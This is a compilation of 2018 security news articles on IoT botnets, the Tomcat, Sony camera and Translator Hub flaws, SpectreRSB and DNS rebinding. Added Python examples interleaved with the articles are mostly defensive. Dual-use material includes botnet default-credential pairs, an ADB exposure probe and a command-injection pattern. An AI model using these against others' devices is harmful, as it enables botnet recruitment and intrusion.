The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that "runs on encryption software to generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aiming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 November to take a decision.

Information Disclosure, DoS Flaws Patched in Apache Tomcat
24.7.2018 securityweek

The Apache Software Foundation informed users over the weekend that updates for the Tomcat application server address several vulnerabilities, including issues that can lead to information disclosure and a denial-of-service (DoS) condition.

Apache Tomcat is an open source implementation of the Java Servlet, JavaServer Pages (JSP), Java WebSocket and Java Expression Language technologies. Tomcat is the most widely used web application server, with a market share of over 60 percent.

One of the more serious flaws, CVE-2018-8037, impacts Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Patches are included in Tomcat 9.0.10 and 8.5.32.

The vulnerability, rated “important,” has been described by the Apache Software Foundation as an information disclosure issue caused by a bug in the tracking of connection closures that can lead to user sessions getting mixed up.

Another security hole rated “important” is CVE-2018-1336, a bug in the UTF-8 decoder that can lead to a DoS condition. The flaw affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x, and it has been resolved with the release of versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90.

“An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service,” the Apache Software Foundation said in its advisory.
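
The failure mode here is a decoder that keeps trying to emit a supplementary character (one that needs two UTF-16 code units) into an output buffer that cannot hold it. The following is an added example, not Tomcat's decoder: a UTF-8 to UTF-16 decoder that writes into a fixed-capacity buffer, reports an overflow without advancing its input position (so a surrogate pair is never split across buffers), and a driver loop that treats "overflow with zero progress" as an error rather than retrying forever. The byte strings in the test are constructed.

```python
# Added example, not Tomcat's code: a UTF-8 -> UTF-16 decoder that writes into a
# fixed-capacity output buffer and reports OVERFLOW instead of looping when a
# supplementary character (one that needs two UTF-16 code units) does not fit.

OVERFLOW = "OVERFLOW"      # output buffer full, input position not advanced
UNDERFLOW = "UNDERFLOW"    # all available input consumed (or a sequence is cut off)

_MIN_CP = {1: 0, 2: 0x80, 3: 0x800, 4: 0x10000}   # rejects overlong encodings

def _sequence_length(lead):
    if lead < 0x80:
        return 1
    if 0xC2 <= lead <= 0xDF:
        return 2
    if 0xE0 <= lead <= 0xEF:
        return 3
    if 0xF0 <= lead <= 0xF4:
        return 4
    raise ValueError("invalid UTF-8 lead byte 0x%02x" % lead)

def _code_point(seq):
    n = len(seq)
    cp = seq[0] if n == 1 else seq[0] & (0x7F >> n)
    for b in seq[1:]:
        if b & 0xC0 != 0x80:
            raise ValueError("invalid UTF-8 continuation byte")
        cp = (cp << 6) | (b & 0x3F)
    if cp < _MIN_CP[n] or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
        raise ValueError("invalid code point U+%04X" % cp)
    return cp

def decode_into(src, start, capacity):
    """Decode src[start:] into at most `capacity` UTF-16 code units.
    Returns (status, units, position). On OVERFLOW, position is the offset of
    the character that did not fit, so the caller resumes exactly there and a
    surrogate pair is never split across two output buffers."""
    units, i = [], start
    while i < len(src):
        n = _sequence_length(src[i])
        if i + n > len(src):
            return UNDERFLOW, units, i           # sequence cut off: need more input
        cp = _code_point(src[i:i + n])
        need = 2 if cp >= 0x10000 else 1
        if len(units) + need > capacity:
            return OVERFLOW, units, i            # do not advance, do not emit half a pair
        if need == 2:
            cp -= 0x10000
            units += [0xD800 | (cp >> 10), 0xDC00 | (cp & 0x3FF)]
        else:
            units.append(cp)
        i += n
    return UNDERFLOW, units, i

def decode_all(src, capacity):
    """Drive decode_into with a small buffer, as a server does with its
    per-connection char buffer. Terminates on every input."""
    out, pos = [], 0
    while pos < len(src):
        status, units, new_pos = decode_into(src, pos, capacity)
        out.extend(units)
        if status == UNDERFLOW:
            if new_pos < len(src):
                raise ValueError("truncated UTF-8 sequence at offset %d" % new_pos)
            break
        if new_pos == pos:                       # OVERFLOW with zero progress
            raise ValueError("buffer of %d units cannot hold the character at offset %d"
                             % (capacity, pos))
        pos = new_pos
    return out
```

The guard in `decode_all` is the point: a decoder that reports overflow but makes no progress must surface that as an error, otherwise a single four-byte sequence from a client becomes a CPU-bound infinite loop on the server.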

The latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x releases also patch a low severity issue tracked as CVE-2018-8034: the WebSocket client did not verify the server's host name when connecting over TLS.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the advisory for this vulnerability.

US-CERT has also released an alert, recommending that users review the Apache advisories and apply the updates.

Apache Tomcat vulnerabilities are less likely to be exploited in the wild. There was a worm targeting Apache Tomcat servers a few years ago, but it leveraged common username and password combinations rather than exploiting any vulnerabilities.

The Apache Software Foundation also informed customers last week of vulnerabilities impacting Apache Ignite, an open source memory-centric distributed database, caching, and processing platform. Ignite is currently ranked 66 by DB-Engines.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution.

Experts warn of new campaigns leveraging Mirai and Gafgyt variants
24.7.2018 securityaffairs BotNet

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.
Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the source code of the infamous Mirai botnet was leaked online, many variants have emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the latest variants to appear in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 and had its source code leaked in early 2015.

In September 2016, joint research conducted by Level 3 Communications and Flashpoint identified a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by Palo Alto Networks.

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include code to exploit the D-Link DSL-2750B OS command injection flaw; the experts noted that this capability was added only a few weeks after a Metasploit module for the flaw was published on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot, one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits, such as code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-10562) in Dasan GPON routers, a Huawei router flaw tracked as CVE-2017-17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution flaw in CCTVs and DVRs from over 70 vendors, and a JAWS web server command execution flaw.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by Palo Alto Networks.

The campaign uses two different encryption schemes. The bot propagates only via exploits and, once a device is compromised, blocks further infection by using iptables to drop packets received on certain ports.

The latest Mirai variant uses the IP address 213[.]183.53.120 both for serving payloads and as its command and control (C2) server; the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers used the same exploits as the first but also carried out credential brute-force attacks.

The campaign was named Okane after the binaries that its shell script downloads to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis.

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

root/t0talc0ntr0l4! – default credentials for Control4 devices
admin/adc123 – default credentials for ADC FlexWave Prism devices
mg3500/merlin – default credentials for Camtron IP cameras
Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”


Experts at Palo Alto Networks observed a third campaign, tracked as Hakai, that attempted to infect devices with the Gafgyt malware using all of the previous exploit code except the UPnP SOAP TelnetD command execution exploit.

Further details about the campaigns, including IoCs, are included in the post published by Palo Alto Networks.

SpectreRSB – new Spectre CPU side-channel attack using the Return Stack Buffer
24.7.2018 securityaffairs Attack

Researchers from the University of California, Riverside (UCR) have devised a new Spectre CPU side-channel attack called SpectreRSB.
SpectreRSB leverages the speculative execution technique implemented by most modern CPUs to optimize performance.

Unlike other Spectre attacks, SpectreRSB recovers data from speculative execution by targeting the Return Stack Buffer (RSB).

“rather than exploiting the branch predictor unit, SpectreRSB exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return addresses.” reads the research paper.

“We show that both local attacks (within the same process such as Spectre 1) and attacks on SGX are possible by constructing proof of concept attacks”

The experts demonstrated that they could pollute the RSB to control the predicted return address and thereby steer the CPU's speculative execution.

The experts explained that the RSB is shared among hardware threads that execute on the same virtual processor, enabling inter-process, or even inter-VM, pollution of the RSB.

The academics proposed three attack scenarios that leverage the SpectreRSB attack to pollute the RSB and gain access to data they weren’t authorized to view.

In two attacks, the experts polluted the RSB to access data from other applications running on the same CPU. In the third attack, they polluted the RSB to cause a misspeculation that exposes data outside an SGX compartment.

“an attack against an SGX compartment where a malicious OS pollutes the RSB to cause a misspeculation that exposes data outside an SGX compartment. This attack bypasses all software and microcode patches on our SGX machine” continues the paper.

Researchers said they reported the issue to Intel, but also to AMD and ARM. Researchers only tested the attack on Intel CPUs, but it is likely that both AMD and ARM processors are affected because they both use RSBs to predict return addresses.

According to the researchers, current Spectre patches are not able to mitigate the SpectreRSB attacks.

“Importantly, none of the known defenses including Retpoline and Intel’s microcode patches stop all SpectreRSB attacks,” wrote the experts.

“We believe that future system developers should be aware of this vulnerability and consider it in developing defenses against speculation attacks.”

The good news is that Intel already has a mitigation that stops this attack on some CPUs, but it has not been rolled out to all of its processors.

“In particular, on Core-i7 Skylake and newer processors (but not on Intel’s Xeon processor line), a patch called RSB refilling is used to address a vulnerability when the RSB underfills” the researchers continue.

“This defense interferes with SpectreRSB’s ability to launch attacks that switch into the kernel. We recommend that this patch should be used on all machines to protect against SpectreRSB.”

A spokesperson for Intel told El Reg the Xeon maker believes its mitigations do thwart SpectreRSB side-channel shenanigans:

“SpectreRSB is related to Branch Target Injection (CVE-2017-5715), and we expect that the exploits described in this paper are mitigated in the same manner. We have already published guidance for developers in the whitepaper, Speculative Execution Side Channel Mitigations. We are thankful for the ongoing work of the research community as we collectively work to help protect customers.”

Sony addresses remotely exploitable flaws in Sony IPELA E Network Cameras
23.7.2018 securityaffairs

Sony fixed 2 remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code.
Sony addressed two remotely exploitable flaws in Sony IPELA E Series Network Camera products that could be exploited to execute commands or arbitrary code on affected devices.

The first vulnerability, tracked as CVE-2018-3937, is a command injection issue in the measurementBitrateExec functionality of the IPELA E Series Network Camera.

The vulnerability was reported by researchers Cory Duplantis and Claudio Bozzato of Cisco Talos. An attacker could execute arbitrary commands by sending a specially crafted HTTP GET request to a vulnerable device.

“An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The experts explained that the device does not validate the server address (the -c option) while parsing the input measurement string. An attacker can supply any string as the server address and it will be passed to system() and executed.

“While parsing the input measurement string, there isn’t a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” the experts continue.
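
The following is an added example, not the camera's firmware (which is C): the same pattern rendered in Python, with the unsafe form beside a hardened one. The binary path `/usr/bin/measure_bitrate` and the `-c <server> -t <seconds>` option layout are assumptions for illustration. The unsafe function only returns the string it would hand to a shell, so the example is safe to run.

```python
# Added example, not the camera's firmware: the vulnerable pattern behind
# CVE-2018-3937 rendered in Python beside a hardened form. The binary path
# /usr/bin/measure_bitrate and the "-c <server> -t <seconds>" option format
# are assumptions for illustration.
import ipaddress
import re
import subprocess

_HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

def parse_measurement(params):
    """Parse the attacker-controlled '-c <server> -t <seconds>' string into a dict."""
    toks = params.split()
    if len(toks) % 2:
        raise ValueError("malformed option string")
    opts = {}
    for flag, value in zip(toks[::2], toks[1::2]):
        if not flag.startswith("-") or len(flag) != 2:
            raise ValueError("malformed option string")
        opts[flag[1]] = value
    return opts

def vulnerable_command_line(params):
    """The bug: the server address is pasted into a shell string that the CGI
    hands to system(). Returned rather than executed so it can be inspected."""
    opts = parse_measurement(params)
    return "/usr/bin/measure_bitrate -c %s -t %s" % (opts["c"], opts["t"])

def valid_server(server):
    """Accept only an IP address literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(server)
        return True
    except ValueError:
        return len(server) <= 253 and _HOSTNAME_RE.match(server) is not None

def hardened_argv(params):
    """Validate both options, then build an argv list so no shell is involved."""
    opts = parse_measurement(params)
    server = opts.get("c", "")
    if not valid_server(server):
        raise ValueError("server address rejected")
    seconds = int(opts.get("t", ""))            # ValueError on anything non-numeric
    if not 1 <= seconds <= 300:
        raise ValueError("duration out of range")
    return ["/usr/bin/measure_bitrate", "-c", server, "-t", str(seconds)]

def run_measurement(params):
    """Hardened execution: argv list, shell=False, bounded runtime."""
    return subprocess.run(hardened_argv(params), shell=False,
                          capture_output=True, text=True, timeout=330)
```

Two things make the hardened form safe: the value is checked against a strict grammar for what a server address can be, and the command is executed as an argument vector rather than a shell string, so characters like `;`, backticks or `$(...)` never reach a shell even if the validation were later loosened.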


The second issue, tracked as CVE-2018-3938, is a stack buffer overflow that resides in the 802dot1xclientcert.cgi functionality of the Sony IPELA E Series Camera products.

“An exploitable stack buffer overflow vulnerability exists in the “802dot1xclientcert.cgi” functionality of Sony IPELA E Series Camera. A specially crafted POST request can cause a stack buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability. Detailed vulnerability information can be found here.” wrote the researchers.

The vulnerability can be exploited by sending a specially crafted POST request.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” the experts continue.

The 802dot1xclientcert.cgi component is “designed to handle everything related to certificate management for 802.1x.”

The handler does not check the length (strlen) of the incoming data before copying it directly into a fixed-size local buffer with memcpy, so an attacker can supply oversized content to overflow the stack buffer and execute code remotely on the affected device.

Both vulnerabilities affect Sony IPELA E series G5 firmware 1.87.00; Sony released an update last week to address them.

Botnet Targets Open Ports on Android Devices
23.7.2018 securityweek BotNet

A wave of attacks is targeting Android devices with port 5555 open, likely in an attempt to ensnare them into a botnet, Trend Micro warns.

TCP port 5555 is designed to allow management of devices via Android Debug Bridge (ADB), an Android SDK feature that allows developers to easily communicate with devices and to run commands on them or fully control them.

The ADB port is meant to be disabled on commercial devices and to require initial USB connectivity to be enabled. Last month, however, security researcher Kevin Beaumont revealed that many devices ship with ADB enabled, which leaves them exposed to attacks.

Scanning attacks specifically targeting the ADB port have been seen since January. In early 2018, a worm leveraging a modified version of Mirai’s code was searching for devices with open port 5555 to spread for crypto-mining purposes.
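
The worm's first step is the same handshake any ADB client performs. The block below is an added example, not Trend Micro's or Google's code: it builds the ADB CONNECT message, parses the daemon's reply and classifies what a TCP/5555 listener is, so an administrator can check whether a device they own is exposed. The message layout follows the ADB wire protocol (six little-endian uint32 fields: command, arg0, arg1, payload length, payload checksum, magic; then the payload); the reply bytes in the test are constructed.

```python
# Added example, not Trend Micro's or Google's code: build the ADB CONNECT
# handshake message, parse the daemon's reply and classify what an exposed
# TCP/5555 service is. Message layout follows the ADB wire protocol: six
# little-endian uint32 fields (command, arg0, arg1, length, checksum, magic)
# followed by the payload. The reply bytes in the test are constructed.
import socket
import struct

A_CNXN = 0x4E584E43            # b"CNXN" as a little-endian uint32
A_AUTH = 0x48545541            # b"AUTH"
A_VERSION = 0x01000000
MAX_PAYLOAD = 4096
HEADER = struct.Struct("<6I")

OPEN = "open: ADB accepts connections without authentication"
AUTH_REQUIRED = "ADB present, RSA authentication required"
NOT_ADB = "no ADB handshake in reply"

def checksum(payload):
    return sum(payload) & 0xFFFFFFFF

def build_message(command, arg0, arg1, payload=b""):
    header = HEADER.pack(command, arg0, arg1, len(payload),
                         checksum(payload), command ^ 0xFFFFFFFF)
    return header + payload

def build_connect():
    """CNXN(version, maxdata, "host::") is the client's first message."""
    return build_message(A_CNXN, A_VERSION, MAX_PAYLOAD, b"host::\x00")

def parse_message(buf):
    if len(buf) < HEADER.size:
        raise ValueError("short header")
    command, arg0, arg1, length, check, magic = HEADER.unpack_from(buf)
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("bad magic: not an ADB message")
    payload = buf[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    if checksum(payload) != check:
        raise ValueError("payload checksum mismatch")
    return command, arg0, arg1, payload

def classify_reply(command, payload):
    """A daemon that answers CNXN with its own CNXN ("device::...") grants a
    shell with no authentication; one that sends AUTH first requires a key."""
    if command == A_CNXN and payload.startswith(b"device::"):
        return OPEN
    if command == A_AUTH:
        return AUTH_REQUIRED
    return NOT_ADB

def _recv_exact(sock, n):
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("connection closed early")
        data += chunk
    return data

def probe(host, port=5555, timeout=3.0):
    """Check one host you are authorised to test; returns a classification string."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect())
        header = _recv_exact(sock, HEADER.size)
        length = HEADER.unpack(header)[3]
        command, _, _, payload = parse_message(header + _recv_exact(sock, length))
        return classify_reply(command, payload)
```

Run `probe("192.0.2.50")` against a device on your own network; a result of `OPEN` means anyone who can reach port 5555 gets the same shell the worm uses, and the device should have ADB over TCP disabled or be moved behind a firewall.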

Now, Trend Micro says a new exploit is targeting port 5555. The security firm has observed a spike in activity on July 9-10, when network traffic came mainly from China and the US, followed by a second wave on July 15, primarily involving Korea.

“From our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. It drops the stage 1 shell script via ADB connection to launch on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary,” Trend Micro explains.

After infecting devices, the malware targets a series of processes for termination and launches its own child processes, one of which is responsible for spreading the malware as a worm. It also opens a connection to the command and control (C&C) server.

The payload also contains a header with a number of targets and IP packet types to be sent, which suggests the malware was designed to launch distributed denial of service (DDoS) attacks. It can send UDP, TCP SYN and TCP ACK packets with a random payload of random length, UDP packets with a random payload tunneled through Generic Routing Encapsulation (GRE), and TCP SYN packets.

Trend Micro also discovered that the downloaded binaries connect to the C&C server at 95[.]215[.]62[.]169, which was found to be linked to the Mirai variant Satori.

“It’s reasonable to believe that the same author was behind this sample and Satori,” Trend's security researchers say.

The malware’s worm-like spreading capabilities could suggest other attacks might follow the recently observed spikes in activity, Trend Micro also notes. The security firm suggests the actor behind the malware might have been “testing the effectiveness of their tools and tactics to prepare for a more serious attack.”

An online search reveals over 48,000 IoT systems exposing ADB, but not all of them may be reachable, as some are likely behind routers with Network Address Translation (NAT). Even so, misconfigurations might make these devices accessible from the Internet, turning them into easy targets for the malware.

“All multimedia devices, smart TVs, mobile phones, and other devices without additional protection are easy targets for this malware regardless of the user’s password strength,” Trend Micro concludes.

Microsoft Addresses Serious Vulnerability in Translator Hub
23.7.2018 securityweek

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises to build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Mahmood also found that the request had no Cross-Site Request Forgery (CSRF) protection, meaning an attacker could make a logged-in user's browser send the request and perform the action on that user's behalf.

In the attack scenario he describes, the attacker needs to know the ProjectID of a logged-in victim. They could then embed in a page a URL that issues the remove command; as soon as the victim visits that page, the request is sent from their browser and the project is removed.

Further analysis revealed an Insecure Direct Object Reference (IDOR) vulnerability: the server did not check that the ProjectID in the removal request belonged to the requesting user, so an attacker could set any ProjectID and delete any project in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.
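
The two defects compound: CSRF lets an attacker drive a victim's browser, and the missing ownership check lets any session delete any project. The following is an added example, not Microsoft's code: an in-memory model of the removal endpoint with the reported behaviour beside a corrected handler that requires a per-session CSRF token and checks that the project belongs to the session's user. Store, users and tokens are constructed for the example.

```python
# Added example, not Microsoft's code: an in-memory model of the project
# removal endpoint showing the two defects described above (no CSRF token, no
# ownership check on projectid) beside the corrected handler. The store and
# user names are constructed for the example.
import hmac
import secrets

class ProjectService:
    def __init__(self):
        self.projects = {}      # project_id -> owner user name
        self.sessions = {}      # session cookie -> {"user": ..., "csrf": ...}
        self._next_id = 1

    def login(self, user):
        """Returns the session cookie; a per-session CSRF token is minted with it."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(16)}
        return sid

    def csrf_token(self, sid):
        """Embedded in the page's form/JS and sent back with state-changing requests."""
        return self.sessions[sid]["csrf"]

    def create_project(self, sid):
        pid = self._next_id
        self._next_id += 1
        self.projects[pid] = self.sessions[sid]["user"]
        return pid

    def remove_project_vulnerable(self, sid, project_id):
        """As reported: only 'is someone logged in?' is checked. A cross-site
        request rides on the victim's cookie, and any projectid is accepted."""
        if sid not in self.sessions:
            return 401, "login required"
        self.projects.pop(project_id, None)
        return 200, "removed"

    def remove_project(self, sid, project_id, csrf_token):
        """Fixed: the request must carry the session's CSRF token, and the
        project must belong to the session's user."""
        sess = self.sessions.get(sid)
        if sess is None:
            return 401, "login required"
        if not csrf_token or not hmac.compare_digest(sess["csrf"], csrf_token):
            return 403, "missing or invalid CSRF token"
        if self.projects.get(project_id) != sess["user"]:
            return 404, "project not found"    # same answer for absent and not-yours
        del self.projects[project_id]
        return 200, "removed"
```

Returning the same 404 for "does not exist" and "not yours" keeps the sequential IDs from being enumerable through the error message; the token comparison uses `hmac.compare_digest` so it does not leak timing. A `SameSite` cookie attribute is a useful second layer, but the token check is what makes the endpoint safe for browsers that do not honour it.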

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.

State-Actors Likely Behind Singapore Cyberattack: Experts
23.7.2018 securityweek Cyber

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

Hoh told national broadcaster Channel NewsAsia that the attack was an "advanced persistent threat".

"The nature of such attacks are that they are conducted by nation states using very advanced tools," he said.

"They tend to be well resourced, well-funded and highly sophisticated."

Russia -- which is accused of meddling in the US presidential election -- China, Iran and North Korea are believed to have the capability to carry out such attacks.

Analysts, however, would not be drawn into speculation on who might be behind the hack or why Singapore was targeted.

The attack started two weeks after the wealthy city-state hosted the historic summit between US President Donald Trump and North Korean leader Kim Jong Un.

Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

"Any non-public health information could be used for extortion. Russian spy services have a long history of doing this."

Medical information, like personal data, can also be easily monetised on criminal forums, said Sanjay Aurora, Asia-Pacific managing director of Darktrace.

"Beyond making a quick buck, a more sinister reason to attack would be to cause widespread disruption and systemic damage to the healthcare service -- as a fundamental part of critical infrastructure –- or to undermine trust in a nation's competency to keep personal data safe," he told AFP.

- Hyper-connected -

Today, cybercriminals are targeting more than just individuals or banks, said Shahnawaz Backer, regional security specialist at F5 Networks.

"Government services, from healthcare to education, are targets that are just as likely, as evidenced by the recent attacks in Singapore," Backer said.

"As Singapore embraces the digital revolution, security breaches are bound to happen. Our growing digital footprint is growing every day, and enterprises need to take strict measures to safeguard and protect their data."

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the breach. A former judge will head an inquiry looking into the hack.

Singapore officials have cautioned against jumping to conclusions about the attackers.

"With regard to the prime minister's data and why he was targeted, I would say that it's perhaps best not to speculate what the attacker had in mind," said David Koh, head of Singapore's Cyber Security Agency.

The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their bedrooms to nation-states.

Earlier this month, US intelligence chief Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".

Half a Billion Enterprise Devices Exposed by DNS Rebinding
23.7.2018 securityweek Hacking

Nearly half a billion devices used by enterprises are exposed to cyberattacks by DNS rebinding, according to a study conducted by IoT security firm Armis.

DNS rebinding, an attack method that has been known for more than a decade, allows a remote hacker to bypass the targeted entity’s network firewall and abuse their web browser to directly communicate with devices on the local network and exploit any vulnerabilities they may have. Getting the target to access a malicious page or view a malicious advertisement is often enough to conduct an attack that can lead to theft of sensitive information and taking control of vulnerable devices.

Google Project Zero researcher Tavis Ormandy revealed a few months ago that DNS rebinding could be used to exploit critical flaws in BitTorrent’s uTorrent application and the Transmission BitTorrent client.

More recently, researcher Brannon Dorsey showed how malicious actors could exploit vulnerabilities in Google Home and Chromecast devices, Roku TVs, Sonos Wi-Fi speakers, routers, and smart thermostats via DNS rebinding.

Armis, the firm that discovered the Bluetooth flaws dubbed BlueBorne, conducted its own research on the impact of DNS rebinding on enterprises.

The company estimates that there are 496 million enterprise devices worldwide that are exposed due to DNS rebinding. This includes 165 million printers, 160 million IP cameras, 124 million IP phones, 28 million smart TVs, 14 million switches and routers, and 5 million media players.

Number of devices vulnerable to DNS rebinding attacks

“Because of the widespread use of the types of devices listed above within enterprises, Armis can say that nearly all enterprises are susceptible to DNS rebinding attacks,” Armis said.

As an example of vulnerabilities that can be exploited as a result of DNS rebinding, the company highlighted the flaws patched this month by Cisco in its IP phones. Armis also pointed to the critical security holes discovered recently in Axis and Foscam cameras.

As for printers, researchers noted, “Unfortunately, printers are one of the least managed, most poorly configured devices in the enterprise. Aside from adjusting basic network configurations, enterprises typically deploy printers with default settings, making them an ideal target for a DNS rebinding attack.”

In an attack scenario described by Armis, the attacker simply needs to trick the targeted user into visiting a specially crafted website which hosts JavaScript code that will be executed in the victim’s browser. The JavaScript code instructs the browser to scan local IP addresses in search of vulnerable devices.

Once vulnerable systems are identified, the attacker can use DNS rebinding to send arbitrary commands (e.g. log into the web server) directly to the IP address of the compromised IoT device. The attacker can also establish an outbound connection to the C&C server and chances are that none of these communications will be detected or blocked by security products.

Since DNS rebinding is possible due to how DNS and web browsers work, Armis believes the best way for enterprises to protect their networks against attacks is to monitor all devices for signs of a breach, perform a risk analysis of IoT devices to determine which systems are vulnerable, and ensure that the devices are secure, including by applying software patches and disabling unnecessary services.
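
Beyond monitoring, there are two well-known technical controls that break the attack described above, and both are cheap. The block below is an added example, not Armis's code: a Host-header check for a device's embedded web server (after a rebind, the victim's browser still sends the attacker's domain in `Host`, so a device that only answers to its own names refuses the request) and a resolver-side filter that drops answers mapping an external name onto an internal address, the idea behind dnsmasq's `--stop-dns-rebind`. Names and addresses are constructed.

```python
# Added example, not Armis's code: the two standard DNS-rebinding defences,
# a Host-header check on the device's embedded web server and a resolver-side
# filter that refuses to map external names onto internal addresses. Names and
# addresses are constructed for the example.
import ipaddress

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_unspecified

def host_from_header(host_header):
    """Strip an optional port; handles bracketed IPv6 literals."""
    h = host_header.strip()
    if h.startswith("["):
        return h[1:h.index("]")].lower()
    return h.rsplit(":", 1)[0].lower() if h.count(":") == 1 else h.lower()

def host_header_allowed(host_header, own_names):
    """Device side. After a rebind the browser still sends the attacker's domain
    in Host; a device that only answers to its own names breaks the attack."""
    return host_from_header(host_header) in {n.lower() for n in own_names}

def filter_rebinding_answers(qname, answers, internal_zones=()):
    """Resolver side (the idea behind dnsmasq's --stop-dns-rebind): an answer that
    points a public name at an internal address is dropped, unless the name is in
    a zone that legitimately lives on the internal network."""
    name = qname.rstrip(".").lower()
    if any(name == z or name.endswith("." + z) for z in internal_zones):
        return list(answers)
    return [ip for ip in answers if not is_internal(ip)]
```

The resolver filter protects every client on the network at once, including the printers and cameras that will never get a firmware update; the Host-header check is what a device vendor should ship. Neither helps once a browser has already cached the attacker's first, public answer, which is why the resolver must also apply the filter to the short-TTL second answer.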

Calisto macOS Backdoor Remained Undetected for Two Years
